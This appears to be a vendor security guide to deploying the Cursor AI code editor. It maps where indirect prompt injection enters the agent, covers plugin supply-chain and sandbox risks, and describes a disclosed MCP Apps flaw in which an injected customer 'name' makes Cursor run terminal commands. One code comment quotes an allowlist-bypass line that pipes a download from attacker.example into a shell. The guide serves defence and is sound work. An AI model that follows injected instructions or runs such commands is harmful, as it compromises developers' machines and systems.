
Securing Cursor: A Security Practitioner's Guide

Enterprise security guide for Cursor: the threat model, the Cursor AI risk surface, and the governance questions you need answered before you scale Cursor across your organization.

Published: April 21, 2026

Cursor has a high level of autonomy across your development workflow: agent mode, shell execution, filesystem writes, and web browsing give Cursor's AI access to a mix of trusted and untrusted data. With each release, the range of systems and data that end users can wire into Cursor grows: Automations triggered by Slack, Linear, GitHub, or PagerDuty events. Long-running agents that hold context across extended tasks. Bugbot code review with MCP tool access that learns over time. Plugins that bundle skills, subagents, MCP servers, hooks, and rules into a single install. An expanding list of AI and infrastructure subprocessors processing your code. Canvases now allow agents to render interactive UIs, and MCP Apps allow MCP servers to return interactive UIs (details on an unremediated RCE vulnerability in Cursor's MCP Apps feature below).

Each of those is another way for untrusted input to reach the agent, or another action the agent can take on your systems. Indirect prompt injection is a serious risk.

This guide walks through the Cursor threat model in depth so your team can decide which admin configurations to implement to secure your organization's Cursor deployment for your specific use cases.

Want the setting-by-setting Cursor configuration guide?

Request the full guide for the latest Cursor release

The Threat Model

Cursor's AI risk is categorically high because its AI features interact with untrusted input sources.

A useful way to think about Cursor security is to map out where untrusted data enters and where trusted actions exit.

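| Examples of where untrusted input enters Cursor | Examples of where agent actions impact the user's development ecosystem |
|---|---|
| Repository code and dependency files (READMEs, docstrings) | Shell command execution |
| Pull requests and PR comments | Filesystem writes |
| Tickets (Jira, Linear) | Git operations |
| Docs and web content reached through browsing | MCP tool calls into connected systems |
| MCP tool output, plus Slack, PagerDuty, and GitHub events that trigger Automations | PR comments and review feedback |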

When an attacker can influence Cursor's input data (by planting a prompt in a README, a dependency's docstring, a PR comment, or a Jira ticket), they can attempt to hijack the actions in the right column. Almost every meaningful Cursor risk reduces to narrowing one of those two columns or breaking the path between them.
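One way to picture "breaking the path" is a taint rule: once any untrusted source has entered the agent's context, every high-impact action falls back to human approval. The Python sketch below is illustrative only. It is not a Cursor feature or API, and the names in `UNTRUSTED_SOURCES` and `HIGH_IMPACT_ACTIONS` are hypothetical stand-ins for the two columns.

```python
from dataclasses import dataclass, field

# Hypothetical labels for the two columns; not Cursor identifiers
UNTRUSTED_SOURCES = {"readme", "pr_comment", "jira_ticket", "slack_message", "web_page", "mcp_tool_output"}
HIGH_IMPACT_ACTIONS = {"shell_exec", "file_write", "git_push", "mcp_tool_call", "post_pr_comment"}


@dataclass
class AgentContext:
    """Tracks which sources have been read into the agent's context."""
    sources: set[str] = field(default_factory=set)

    def ingest(self, source: str) -> None:
        self.sources.add(source)

    @property
    def tainted(self) -> bool:
        # Tainted as soon as any untrusted source has been ingested
        return bool(self.sources & UNTRUSTED_SOURCES)


def requires_human_approval(ctx: AgentContext, action: str) -> bool:
    """Break the path: high-impact actions need a human once the context is tainted."""
    return ctx.tainted and action in HIGH_IMPACT_ACTIONS
```

The decision keys on what the agent has *read*, not on what the user asked for, because an indirect injection arrives through data rather than through the user's prompt.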

Cursor-specific risks

A handful of Cursor capabilities concentrate risk and deserve particular attention when planning a secure Cursor deployment:

Auto-Run and command execution. Agents that can run shell commands without per-command approval are the highest-leverage action surface in Cursor. Historical vulnerabilities in command allowlist handling and auto-run behavior have demonstrated that allowlist bypasses are a realistic failure mode.
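To see why allowlist bypasses are a realistic failure mode, compare a naive prefix check with a stricter one. This is a generic sketch with assumed names (`ALLOWED_COMMANDS`, the metacharacter set); it does not reproduce how Cursor actually matches its command allowlist.

```python
import shlex

ALLOWED_COMMANDS = {"git", "ls", "npm"}  # hypothetical allowlist

# Characters that let one "allowed" command chain or smuggle in another
SHELL_METACHARS = set(";&|`$<>()\n")


def naive_is_allowed(command: str) -> bool:
    """Prefix check: approves anything that merely starts with an allowed name."""
    return any(command.startswith(name) for name in ALLOWED_COMMANDS)


def stricter_is_allowed(command: str) -> bool:
    """Reject shell metacharacters, then require an exact match on the executable."""
    if any(ch in SHELL_METACHARS for ch in command):
        return False
    try:
        argv = shlex.split(command)
    except ValueError:  # e.g. unbalanced quotes
        return False
    return bool(argv) and argv[0] in ALLOWED_COMMANDS
```

With the naive check, `git status; curl https://attacker.example | sh` is approved because it starts with `git`. Even the stricter check only narrows the problem: an allowlisted binary can still run arbitrary code through its arguments (for example, `npm install` runs package lifecycle scripts by default).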

Plugins, MCP servers, skills, subagents, hooks, and rules. A single install can bring in all of the above at once. That bundling is also the source of supply-chain risk, which OWASP tracks as LLM03: Supply Chain and which NIST SP 800-218A ("Secure Software Development Practices for Generative AI and Dual-Use Foundation Models: An SSDF Community Profile") treats as a first-class concern in the AI SSDLC. An unvetted plugin is a vector for prompt injection, for silent rule changes, and for introducing MCP servers that can reach internal systems. Team marketplaces mitigate public-marketplace risk but reintroduce insider risk if publishing is not controlled.

Bugbot and code review agents with tool access. When a review agent has MCP tool access, it can pull in context from systems far beyond the diff it is reviewing, and any of that context can carry injected instructions.

Automations and long-running agents. Automations are AI agents that execute on schedules or in response to events from connected services. They are useful precisely because they run without a human initiating each one. As a result, indirect prompt injection delivered via a Slack message, a PagerDuty alert, or a GitHub event can have high impact on Automations. The more steps between human checkpoints, the more opportunity a successful injection has to accumulate damage before it is detected. The NIST Generative AI Profile is explicit that human oversight is a risk-management control that degrades as autonomy increases; autonomous and scheduled agents sit at the far end of that spectrum, where compensating controls need to be strongest.

Sandbox boundaries. Cursor has shipped fixes for out-of-sandbox remote code execution and zero-click data exfiltration reachable through the IDE and CLI. Keeping Cursor on a current, patched version is part of the Cursor security baseline, not an optimization, and mapping sandbox governance to established access-control families (e.g., NIST SP 800-53 AC and SC controls) gives security teams a durable way to document and audit the posture. In the section below, we describe a vulnerability that has yet to be remediated; once it is patched, all clients will need to be updated.

Subprocessors and data residency. Cursor routes code and context through a rotating set of model and infrastructure subprocessors, and the geographies those subprocessors operate from change over time. Data residency, privacy, and regulated data obligations should be re-verified on a scheduled cadence.
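Scheduled re-verification is easier to sustain as a diff than as a full re-read. A minimal sketch, assuming you keep dated snapshots of Cursor's published subprocessor list as a mapping from subprocessor name to processing location. The function name and snapshot format are hypothetical, and nothing here fetches data from Cursor.

```python
def subprocessor_changes(previous: dict[str, str], current: dict[str, str]) -> dict[str, list[str]]:
    """Compare two snapshots mapping subprocessor name -> processing location."""
    added = sorted(current.keys() - previous.keys())
    removed = sorted(previous.keys() - current.keys())
    # Same subprocessor, different geography: the case data residency reviews care about most
    relocated = sorted(
        name for name in current.keys() & previous.keys() if current[name] != previous[name]
    )
    return {"added": added, "removed": removed, "relocated": relocated}
```

Any non-empty list is a trigger to re-check privacy and regulated-data obligations before the next review cycle.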

Example risk

Unpatched MCP Apps RCE Vulnerability



Cursor 2.6 added support for MCP Apps. One day later, on March 4th, we responsibly disclosed a remote code execution vulnerability. MCP Apps is an official extension of the MCP protocol, co-authored by Anthropic, OpenAI, and the MCP community. With MCP Apps, an MCP server can return interactive interfaces such as data visualizations, forms, and dashboards that render directly in an AI chat when an agent calls an MCP tool.



Per the official documentation, these responses must be rendered inside a sandbox, which protects MCP clients like Cursor even when a server is not fully trusted (for example, because it fails to sanitize untrusted user input that the tool displays, or because it is malicious).

However, in Cursor, an MCP app can return a response containing JavaScript that issues keyboard commands to open the user’s terminal window and execute arbitrary shell commands on their behalf. This violates the security guarantee: “MCP apps can’t … escape their container”.

To demonstrate this risk, we set up one of Anthropic’s reference MCP apps that would normally handle untrusted data (e.g., customer names).

The ‘customer data’ in the reference implementation is randomly generated; someone building off this implementation would integrate a data source like a CRM or a publicly accessible lead form. We added a record for a ‘customer’ who submitted a ‘name’ full of code.

Note that while this specific example MCP App is not the most likely candidate for use in Cursor, any MCP App can be connected to Cursor, and under the threat model, neither responses from vulnerable servers nor from malicious servers should compromise Cursor.

The reference MCP app does not sanitize data in the customer name field, so a malicious customer can submit HTML code as their 'name', and it will be included in the server's response when the get-customer-data tool is called. The MCP Apps specification explicitly treats compromised Views (interactive responses) as part of the expected threat model.

Yet, Cursor fails to adequately sandbox the MCP App response, so a malicious customer record is able to successfully inject code that executes keyboard commands on behalf of the Cursor user.

The keyboard commands open the user’s terminal and run shell commands on their behalf, yielding remote code execution.
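On the server side, the missing step is output encoding. A minimal sketch, assuming a hypothetical `render_customer_row` helper that builds a View's HTML in Python (the reference app is not written this way): `html.escape` turns injected markup into inert text. This only fixes one vulnerable server; under the threat model above, Cursor's sandbox should contain a compromised View regardless.

```python
import html


def render_customer_row(name: str, email: str) -> str:
    """Hypothetical helper: build one table row for an MCP App view from untrusted CRM data."""
    # Escape every untrusted field so markup in a 'name' renders as text, not HTML
    return f"<tr><td>{html.escape(name)}</td><td>{html.escape(email)}</td></tr>"
```

For example, a 'name' of `<img src=x onerror="alert(1)">` comes back as `&lt;img src=x onerror=&quot;alert(1)&quot;&gt;`, which the browser displays instead of executing.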

This vulnerability was responsibly disclosed to Cursor on March 4th, 2026, via their requested contact method, security-reports@cursor.com, and was then triaged by HackerOne. The report was forwarded to a second analyst and deemed 'out of scope' on March 24th, 2026.

Get the full report to govern MCP App use in Cursor

Getting from threat model to configuration

The threat model above applies across Cursor deployments. What changes across organizations are the use cases for Cursor and the functionality you need: which data sources and action surfaces are acceptable for your workloads given what needs to be built and actioned, and which admin settings you turn on, turn off, or propagate to end-user devices.

Request the full Cursor secure-configuration guide. It maps every admin setting in the Cursor Dashboard to the part of the threat model it addresses, flags interactions between settings, and calls out where behavior has changed in recent releases.

Cursor Security FAQ

What are the main security risks of deploying Cursor in an enterprise?

Cursor's risk surface is driven by three properties: it reads a lot of untrusted input (code, tickets, PRs, docs, web content, MCP tool output), it takes a lot of trusted actions (shell execution, file writes, git operations, MCP tool calls, PR comments), and it increasingly runs without a human directly prompting it (Automations, long-running agents, review agents). The primary risks are indirect prompt injection into any of those inbound channels, supply-chain risk from plugins and MCP servers, command-execution and sandbox-escape risk from the agent, and governance gaps around Automations that act on external events.

How should we think about indirect prompt injection risk in Cursor specifically?

Indirect prompt injection in Cursor is more consequential than in a chat assistant because the agent can take trusted actions across multiple systems. A malicious instruction planted in a dependency's README, a PR comment, a Jira ticket, or a Slack message that triggers an Automation can redirect the agent to run commands, modify files, or call MCP tools in the attacker's interest. This is the risk pattern that both OWASP LLM01 and MITRE ATLAS AML.T0051 describe. To mitigate it, restrict data sources, restrict how connected data sources are configured, restrict what actions the agent can take, and restrict what outbound surfaces the agent can write to.

What is the right way to govern Cursor plugins and MCP servers?

Treat the Cursor Marketplace the way you would treat any third-party software registry. Plugins bundle skills, subagents, MCP servers, hooks, and rules in a single install, which means the blast radius of a bad plugin is the sum of all of those capabilities combined.
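Because the blast radius is the sum of everything a plugin ships, a review should enumerate each component type rather than approve the plugin as a single unit. A minimal sketch, assuming a hypothetical `PluginManifest` summary that your review process fills in; this is not Cursor's actual plugin manifest format.

```python
from dataclasses import dataclass, field

COMPONENT_TYPES = ("skills", "subagents", "mcp_servers", "hooks", "rules")


@dataclass
class PluginManifest:
    """Hypothetical summary of what a plugin installs; not Cursor's real manifest format."""
    name: str
    skills: list[str] = field(default_factory=list)
    subagents: list[str] = field(default_factory=list)
    mcp_servers: list[str] = field(default_factory=list)
    hooks: list[str] = field(default_factory=list)
    rules: list[str] = field(default_factory=list)


def review_findings(plugin: PluginManifest) -> list[str]:
    """List every component type a reviewer must sign off on before the plugin is allowed."""
    findings = []
    for kind in COMPONENT_TYPES:
        items = getattr(plugin, kind)
        if items:
            findings.append(f"{plugin.name}: {len(items)} {kind} -> {', '.join(items)}")
    return findings
```

A plugin that looks like "just a skill" but also ships an MCP server and a hook produces three findings, each of which maps to a different part of the threat model.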

How should we govern Bugbot and other code review agents?

Two governance surfaces matter: the MCP tools the review agent can access, and the pipeline that turns PR feedback into learned rules. Unscoped MCP access expands the review agent's view far beyond the diff in front of it. Unreviewed learned rules mean a prompt injection in a single PR comment can durably change how the review agent behaves on future PRs.

How should we govern Automations and long-running agents?

Automations run on schedules or fire on external events, which means the prompt they act on can come from an attacker-controlled Slack message, a PagerDuty alert, or a GitHub event. Governance requires being explicit about which connected services can trigger Automations, which tools an Automation can call, and who can create them. Long-running agents raise the same concern along the time axis: the longer the horizon and the fewer the human checkpoints, the more room an injection has to compound.
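The three governance questions above (which services can trigger, which tools an Automation can call, who can create one) can be written down as an explicit policy and checked before an Automation is enabled. A minimal sketch; every name in it is hypothetical, and it is not how Cursor's admin dashboard represents Automations.

```python
from dataclasses import dataclass

# Hypothetical org policy; none of these names are Cursor settings
ALLOWED_TRIGGERS = {"github", "linear"}
ALLOWED_TOOLS_BY_TRIGGER: dict[str, set[str]] = {
    "github": {"read_repo", "post_pr_comment"},
    "linear": {"read_repo"},
}
AUTOMATION_CREATORS = {"platform-team"}


@dataclass(frozen=True)
class AutomationRequest:
    creator_group: str
    trigger: str
    tools: frozenset[str]


def review_automation(req: AutomationRequest) -> list[str]:
    """Return policy violations; an empty list means the Automation may be enabled."""
    problems = []
    if req.creator_group not in AUTOMATION_CREATORS:
        problems.append(f"creator group {req.creator_group!r} may not create Automations")
    if req.trigger not in ALLOWED_TRIGGERS:
        problems.append(f"trigger {req.trigger!r} is not an approved event source")
    # Tools are scoped per trigger, so an unapproved trigger gets no tools at all
    extra = req.tools - ALLOWED_TOOLS_BY_TRIGGER.get(req.trigger, set())
    if extra:
        problems.append(f"tools not approved for this trigger: {sorted(extra)}")
    return problems
```

Scoping tools per trigger reflects the point above: the event source determines who can write the prompt, so it should also bound what the Automation can do.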

How should we handle sandbox and command execution?

Treat sandbox posture (what the sandbox allows outbound, what it allows for git writes, whether it is enforceable by admins rather than configured per-project) as a first-class security decision. It's also important to keep Cursor pinned to a current, patched release: running an old client is a cheap way to reintroduce previously fixed out-of-sandbox and command-allowlist vulnerabilities.
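Enforcing "current, patched release" usually comes down to comparing each installed client against an organization-defined minimum version, for example in an endpoint-management check. A minimal sketch, assuming plain dotted numeric versions (no pre-release suffixes) and a minimum you choose yourself; it does not query Cursor for its version.

```python
def parse_version(v: str) -> tuple[int, ...]:
    """Parse a dotted numeric version like '2.6.1' into (2, 6, 1)."""
    return tuple(int(part) for part in v.strip().split("."))


def is_patched(installed: str, minimum: str) -> bool:
    """True if the installed client is at or above the organization's minimum version."""
    a, b = parse_version(installed), parse_version(minimum)
    # Pad the shorter tuple with zeros so '2.6' compares equal to '2.6.0'
    width = max(len(a), len(b))
    a += (0,) * (width - len(a))
    b += (0,) * (width - len(b))
    return a >= b
```

Comparing integer tuples rather than strings matters: as strings, `"2.10" < "2.9"`, which would flag a newer client as outdated.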

Is Cursor appropriate for regulated workloads?

Cursor can be considered for regulated workloads only when admin controls are configured against the threat model above, endpoint and network monitoring are in place, and the current subprocessor footprint matches the organization's regulatory obligations. Because Cursor's capabilities and subprocessor geographies change from release to release, this review must be repeated on a recurring basis, consistent with the continuous-monitoring expectations in the NIST AI RMF Manage function.

Should we allow Cursor at our company?

For most engineering organizations, the answer is yes, with an admin-configured posture appropriate to the sensitivity of the code and data involved, and with a review cadence tied to Cursor releases. Treat Cursor security as a living configuration rather than a one-time allow/block decision, because the scope of actions and data access Cursor has is going to keep expanding.

Ready to implement Cursor securely?

Request a full configuration guide. It comes with a setting-by-setting checklist mapped to the current Cursor release, the interactions between settings, and the admin paths for Enterprise-level enforcement.

References and further reading

The frameworks most relevant to this decision are well established. NIST's AI Risk Management Framework and the accompanying Generative AI Profile (NIST AI 600-1) define the govern-map-measure-manage cycle organizations are expected to apply to systems like Cursor. The OWASP Top 10 for Large Language Model Applications enumerates the specific risk classes — prompt injection, supply chain, excessive agency — that Cursor's architecture touches. MITRE ATLAS catalogs the adversarial techniques attackers actually use against AI-enabled systems. This article uses all three as the backdrop; the goal is to translate them into an actionable posture for Cursor specifically.

NIST

AI Risk Management Framework (AI RMF 1.0) — the govern-map-measure-manage lifecycle for AI systems

NIST AI 600-1: Generative AI Profile — GenAI-specific risks and suggested actions layered on AI RMF

NIST SP 800-218A: Secure Software Development Practices for Generative AI — AI SSDLC, including supply-chain and model-integrity practices

NIST SP 800-53 Rev. 5 — baseline security and privacy controls useful for mapping sandbox, access, and audit controls

OWASP

OWASP Top 10 for Large Language Model Applications — canonical enumeration of LLM risk classes

MITRE

MITRE ATLAS — adversarial threat landscape for AI systems

MITRE ATT&CK — for mapping post-compromise behaviors reachable via agentic code execution

CISA and joint guidance

CISA: Secure by Design — the principles underlying most of the governance posture recommended in this piece